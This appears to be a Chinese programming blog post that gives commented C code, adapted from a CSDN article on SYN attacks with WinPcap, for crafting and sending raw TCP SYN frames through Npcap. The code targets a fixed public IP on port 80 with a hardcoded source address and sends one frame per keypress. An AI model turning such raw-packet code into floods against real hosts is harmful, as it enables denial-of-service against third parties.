Npcap.例子(raw tcp syn)

1、来自:winpcap实现syn攻击 - 125096 - CSDN博客.html(https://blog.csdn.net/qq125096885/article/details/51784524)

2、我的代码:(代码 用Npcap来跑,基本不用修改)(Win7x64、vs2017、使用 x86编译的Debug版本)

// Npcap_01.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//


#include <iostream>

#pragma warning(disable : 4996)

//int main()
//{
//    std::cout << "Hello World!\n"; 
//}

//#define _W64  
//#define HAVE_REMOTE  
#include<stdio.h>  
#include<pcap.h>  
#include<winsock2.h>  
#include <time.h>  
//#include "remote-ext.h"  

#pragma comment(lib,"wpcap.lib")  
#pragma comment(lib,"WS2_32.lib")  


#pragma pack(push,1)  
// Overlay used to patch selected fields of the raw Ethernet/IPv4/TCP frame
// held in bufData. Packing is forced to 1 byte so members map directly onto
// frame offsets. The offsets below assume a 2-byte short and a 4-byte int
// (the page builds with MSVC x86).
typedef struct _TCP_SYN
{
    unsigned char DstMAC[6];  // destination MAC address (frame bytes 0-5)
    unsigned char SrcMAC[6];  // source MAC address (frame bytes 6-11)
    unsigned char OtherData[12];    // bytes 12-23: EtherType plus the first 10 bytes of the IPv4 header
    unsigned short Header_ChechSum; // IPv4 header checksum (bytes 24-25)
    unsigned int SrcIP;       // Source IP address (bytes 26-29)
    unsigned int DstIP;       // Destination IP address (bytes 30-33)
    unsigned short SrcPort;   // Source TCP port (bytes 34-35)
    unsigned short DstPort;   // Destination TCP port (bytes 36-37); usually 80, which htons() stores as 0x5000 on a little-endian host
    unsigned char Ohters[16];       // bytes 38-53: not touched by main
    // NOTE(review): this member lands on bytes 54-55. In the bufData template
    // the TCP checksum bytes (0x8d 0x8d) sit at 50-51, inside Ohters, so this
    // field does not overlay them. It is never read or written in this file.
    unsigned short pak_checksum;
    unsigned char OtherLast[1];     // byte 56; the 66-byte template continues past the end of this struct
}TCP_SYN, *PTCP_SYN;
#pragma pack(pop)  


// Captured 66-byte frame used as the transmit template:
//   bytes  0-13  Ethernet II header (dst MAC, src MAC, EtherType 0x0800 = IPv4)
//   bytes 14-33  IPv4 header, 20 bytes: total length 0x0034, TTL 0x80,
//                protocol 6 (TCP), header checksum 0x7183, then src/dst address
//   bytes 34-65  TCP header, 32 bytes: ports, sequence number, data offset 8,
//                flags 0x02 (SYN), window 0xffff, checksum 0x8d8d, then options
// main overwrites the MAC addresses, IP addresses and ports in place.
// Because this is a string literal, sizeof(bufData) also counts the implicit
// trailing NUL; main passes sizeof(bufData) - 1 as the frame length.
unsigned char bufData[] = "\x00\x25\x86\x27\xd1\x22\x90\x2b\x34\x60\xbd\x44\x08\x00\x45\x00"
"\x00\x34\x61\xdc\x40\x00\x80\x06\x71\x83\xc0\xa8\x01\x6a\x7a\xe4"
"\xea\x6d\x0b\x0c\x00\x50\xb9\xc2\xf5\x06\x00\x00\x00\x00\x80\x02"
"\xff\xff\x8d\x8d\x00\x00\x02\x04\x05\xb4\x01\x03\x03\x01\x01\x01"
"\x04\x02";


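/*
 * Compute the 16-bit one's-complement checksum over `size` bytes starting at
 * `buffer`.
 *
 * The 16-bit words are summed in host byte order; storing the returned value
 * back into the buffer without byte swapping gives the checksum bytes in the
 * same order as the data they cover.
 *
 * buffer  start of the data; it does not need to be 2-byte aligned.
 * size    number of bytes to cover; zero or a negative value covers nothing.
 *
 * Returns the complemented, folded sum (0xFFFF for an empty range).
 */
unsigned short checksum(unsigned short *buffer, int size)
{
    const unsigned char *bytes = (const unsigned char *)buffer;
    unsigned long cksum = 0;
    unsigned short word;

    /* Words are read with memcpy because callers hand in a cast byte buffer
       (main passes &bufData[14]); this avoids a misaligned or type-punned
       load through unsigned short*. */
    while (size > 1)
    {
        memcpy(&word, bytes, sizeof word);
        cksum += word;
        bytes += sizeof word;
        size -= (int)sizeof word;
    }

    /* An odd trailing byte is treated as the first byte of a zero-padded
       word, which is correct on either byte order. Testing for exactly 1
       means a negative size no longer reads a byte from the buffer. */
    if (size == 1)
    {
        word = 0;
        memcpy(&word, bytes, 1);
        cksum += word;
    }

    /* Fold the carries back in until the sum fits in 16 bits. */
    while (cksum >> 16)
    {
        cksum = (cksum >> 16) + (cksum & 0xffff);
    }
    return (unsigned short)(~cksum);
}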


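/*
 * Selects the first adapter that reports an IPv4 address in 172.16.x.x, opens
 * it through Npcap/WinPcap, patches the MAC addresses, IP addresses and ports
 * of the bufData frame template, recomputes the IPv4 header checksum, and
 * transmits that frame once per prompt.
 *
 * Only the IPv4 header checksum is recomputed. The TCP checksum bytes of the
 * template are left as captured, which matches the original author's remark
 * that Wireshark shows the sent frame in its checksum-error colours.
 *
 * Returns 0 after a normal quit, 1 if no adapter list or no matching adapter
 * is available, and -1 if the adapter cannot be opened or a send fails.
 */
int main(int argc, char* argv[])
{
    enum { ETH_HDR_LEN = 14, IP_HDR_LEN = 20, SA_DATA_LEN = 14 };

    pcap_if_t *alldevs = NULL;
    pcap_if_t *seldev = NULL;
    struct pcap_addr *seladdr = NULL;
    pcap_t *fp = NULL;
    char errbuf[PCAP_ERRBUF_SIZE];
    int rc = 0;

    (void)argc;
    (void)argv;

    /* Seeds rand(); nothing in this function currently calls rand(). */
    srand((unsigned int)time(0));

    /* Get the list of local capture devices. */
    if (pcap_findalldevs(&alldevs, errbuf) == -1)
    {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        return 1;
    }

    /* Walk every address of every adapter and stop at the first IPv4
       address whose first two octets are 172.16. */
    for (seldev = alldevs; seldev != NULL; seldev = seldev->next)
    {
        for (seladdr = seldev->addresses; seladdr != NULL; seladdr = seladdr->next)
        {
            if (seladdr->addr == NULL)
                continue;   /* entry without an address: nothing to inspect */

            printf("seldev->name : %s\n", seldev->name);
            for (int i = 0; i < SA_DATA_LEN; i++)
                printf("%d ", (UCHAR)seladdr->addr->sa_data[i]);
            printf("\n");

            /* sa_data[2..5] hold the IPv4 octets only for AF_INET entries;
               for other families those bytes mean something else, so the
               family is checked before comparing them. */
            if (seladdr->addr->sa_family == AF_INET &&
                (UCHAR)seladdr->addr->sa_data[2] == 172 &&
                (UCHAR)seladdr->addr->sa_data[3] == 16)
            {
                printf("will break;\n");
                break;
            }
        }
        if (seladdr != NULL)
            break;

        printf("\n");
    }
    if (seldev == NULL)
    {
        fprintf(stderr, "Can not find network!\n");
        pcap_freealldevs(alldevs);
        return 1;
    }

    /* Show the adapter and the address that matched (the name is a string,
       so it is printed with %s). */
    printf("seldev->name : %s\n", seldev->name);
    for (int i = 0; i < SA_DATA_LEN; i++)
        printf("%d ", (UCHAR)seladdr->addr->sa_data[i]);
    printf("\n");

    /* Open the selected adapter for output.
       NOTE(review): promiscuous mode and the 100-byte snapshot length only
       affect capture; this program never reads packets, so the flag looks
       unnecessary here - confirm before removing it. */
    fp = pcap_open(seldev->name,            /* device name */
        100,                                /* snapshot length */
        PCAP_OPENFLAG_PROMISCUOUS,          /* promiscuous mode */
        1000,                               /* read timeout, ms */
        NULL,                               /* remote authentication */
        errbuf);                            /* error buffer */
    if (fp == NULL)
    {
        /* Report the adapter that was actually tried, not the list head. */
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", seldev->name);
        pcap_freealldevs(alldevs);
        return -1;
    }

    /* Patch the template once; every transmitted frame is identical. */
    PTCP_SYN SynData = (PTCP_SYN)bufData;
    memcpy(SynData->SrcMAC, "\x04\xd4\xc4\x59\x7a\x1c", 6);    /* 04-D4-C4-59-7A-1C */
    memcpy(SynData->DstMAC, "\x04\xf9\x38\xa6\xd7\xcb", 6);    /* 04-f9-38-a6-d7-cb */

    SynData->DstIP = inet_addr("39.156.69.79");     /* destination address written into the frame */
    SynData->DstPort = htons(80);                   /* destination port 80 */
    SynData->SrcIP = inet_addr("172.16.19.181");    /* fixed source address */
    SynData->SrcPort = htons(80);                   /* fixed source port */

    /* The checksum field must be zero while the header is summed. */
    SynData->Header_ChechSum = 0;
    SynData->Header_ChechSum = checksum((unsigned short*)&bufData[ETH_HDR_LEN], IP_HDR_LEN);

    for (;;)
    {
        /* sizeof(bufData) counts the string literal's trailing NUL, which
           is not part of the frame. */
        if (pcap_sendpacket(fp, bufData, sizeof(bufData) - 1) != 0)
        {
            fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
            rc = -1;
            break;
        }

        /* One frame per prompt. Reading stdin instead of system("pause")
           gives the loop an exit, so the cleanup below is reachable. */
        printf("Press Enter to send again, or q then Enter to quit...\n");
        int first = getchar();
        int key = first;
        while (key != '\n' && key != EOF)
            key = getchar();
        if (first == 'q' || first == 'Q' || key == EOF)
            break;
    }

    /* Release the adapter handle and the device list on every exit path. */
    pcap_close(fp);
    pcap_freealldevs(alldevs);
    return rc;
}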

 

3、

4、

5、

 
